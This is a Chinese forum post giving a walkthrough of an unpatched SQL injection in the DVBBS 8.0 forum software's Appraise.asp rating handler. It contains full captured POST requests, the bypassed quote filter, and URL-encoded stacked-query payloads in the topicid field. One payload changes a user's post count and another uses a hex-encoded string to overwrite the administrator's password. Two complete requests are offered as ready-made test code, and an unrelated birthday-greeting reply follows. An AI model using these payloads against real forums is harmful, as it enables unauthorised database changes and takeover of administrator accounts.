Dvbbs8发帖漏洞
<DIV class=ForumPostTitle>动网论坛DVBBS8.0漏洞</DIV><DIV class=ForumPostContentText>
<P>我这边已经假设好了一个DVBBS8 SQL:<BR>我们先来注册一个用户,随便找个帖子。刚才弄坏了。。。。<BR>我们来重新发个帖子。点发表评论,这里来抓包<BR></P>
<P>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#fdfddf><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是代码片段:</FONT><BR><FONT size=3>POST /dvbbs8/Appraise.asp?action=save HTTP/1.1<BR>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*<BR>Referer: </FONT><FONT color=#000000 size=3>http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1</FONT><BR><FONT size=3>Accept-Language: zh-cn<BR>Content-Type: application/x-www-form-urlencoded<BR>Accept-Encoding: gzip, deflate<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)<BR>Host: 192.168.1.91<BR>Content-Length: 91<BR>Connection: Keep-Alive<BR>Cache-Control: no-cache<BR>Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0</FONT>
<P><FONT size=3>boardid=1&topicid=2&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test</FONT></P></TD></TR></TBODY></TABLE></P>
<P>OK,LET's start<BR>LET's make fun<BR>userpost是用户发表过的帖子数量。算错了</P>
<P>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#fdfddf><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是代码片段:</FONT><BR>
<P><FONT size=3>script language='javascript'> <font face="宋体" size=2><BR>p>Microsoft OLE DB Provider for SQL Server</font> <font face="宋体" size=2>错误<BR>'80040e14'</font><BR>p><BR>font face="宋体" size=2>第 1 行: ';' 附近有语法错误。</font><BR>p><BR>font face="宋体" size=2>/dvbbs8/inc/Dv_ClsMain.asp</font><font face="宋体" siz<BR>2>,行 1504</font></FONT></P></TD></TR></TBODY></TABLE></P>
<P><BR>出现一个这个,不要管他,其实我们已经修改成功了!<BR>文章:100 <BR>我们继续来修改,其实是这样的,程序有点小问题需要我们来解决<BR>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#fdfddf><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是代码片段:</FONT><BR><FONT size=3>TopicID = Dvbbs.CheckStr(Request.Form("topicid"))</FONT>
<P><BR><FONT size=3>Public Function Checkstr(Str)<BR> If Isnull(Str) Then<BR> CheckStr = ""<BR> Exit Function <BR> End If<BR> Str = Replace(Str,Chr(0),"")<BR> CheckStr = Replace(Str,"'","''")<BR> End Function</FONT></P></TD></TR></TBODY></TABLE></P>
<P>很明显过滤了单引号。。。。我们这样来饶过<BR>还是修改一下密码吧,现在ADMIN的密码是admin888,我们来把他修改成123456<BR>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#fdfddf><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是代码片段:</FONT><BR><FONT size=3>declare @a sysname<BR>select @a=0x3400390062006100350039006100620062006500350036006500300035003700<BR>update set </FONT><FONT color=#000000 size=3>userpassword=@a</FONT><FONT size=3> where userid=1</FONT></TD></TR></TBODY></TABLE></P>
<P>这样可以修改成功!!!我们把他改回来</P>
<P>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#fdfddf><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是代码片段:</FONT><BR><FONT color=#000000 size=3>%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1</FONT></TD></TR></TBODY></TABLE></P>
<P>OK,这句语句也可以执行<BR>156</P>
<P><BR>看见没,已经修改成了123456</P>
<P><BR>由于漏洞比较严重,请大家谨慎使用,官方还未打补丁!!!!!!</P>
<P>附:两段测试代码</P>
<P>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#fdfddf>
<P><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是测试代码片段一:</FONT><BR><STRONG><FONT style="BACKGROUND-COLOR: #ffffff"><FONT color=#000000>POST /dvbbs8/Appraise.asp?action=save HTTP/1.1<BR>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*<BR>Referer: </FONT><FONT color=#000000>http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1</FONT><BR><FONT color=#000000>Accept-Language: zh-cn<BR>Content-Type: application/x-www-form-urlencoded<BR>Accept-Encoding: gzip, deflate<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)<BR>Host: 192.168.1.91<BR>Content-Length: 151<BR>Connection: Keep-Alive<BR>Cache-Control: no-cache<BR>Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0</FONT></FONT></STRONG></P>
<P><STRONG><FONT style="BACKGROUND-COLOR: #ffffff" color=#000000>boardid=1&topicid=2%3Bupdate+DV%5Fuser+set+userpost%3D100+where+userid%3D3&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test</FONT></STRONG></P></TD></TR></TBODY></TABLE></P>
<P>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#fdfddf>
<P><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是测试代码片段二:</FONT><BR><STRONG><FONT style="BACKGROUND-COLOR: #ffffff"><FONT color=#000000>POST /dvbbs8/Appraise.asp?action=save HTTP/1.1<BR>Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*<BR>Referer: </FONT><FONT color=#000000>http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=3&page=1</FONT><BR>Accept-Language: zh-cn<BR>Content-Type: application/x-www-form-urlencoded<BR>Accept-Encoding: gzip, deflate<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)<BR>Host: 192.168.1.91<BR>Content-Length: 242<BR>Connection: Keep-Alive<BR>Cache-Control: no-cache<BR>Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=allyesno&password=Y1tGx4j886XtB846&userhidden=2; List=list1=1; w0802=5; rtime=0; ltime=1186474916718; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0</FONT></STRONG></P>
<P><STRONG><FONT style="BACKGROUND-COLOR: #ffffff" color=#000000>boardid=1&topicid=3%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1&announceid=3&atype=0&a1=0&a2=0&atitle=22&acodestr=3297&acontent=33</FONT></STRONG></P></TD></TR></TBODY></TABLE></P>
<P> </P></DIV>
re:Dvbbs8发帖漏洞
<P>东东:送你一杯我精心特调的果汁,里面包含100cc的心想事成,200cc的天天开心,300cc的活力十足,祝生日快乐 !</P>
页:
[1]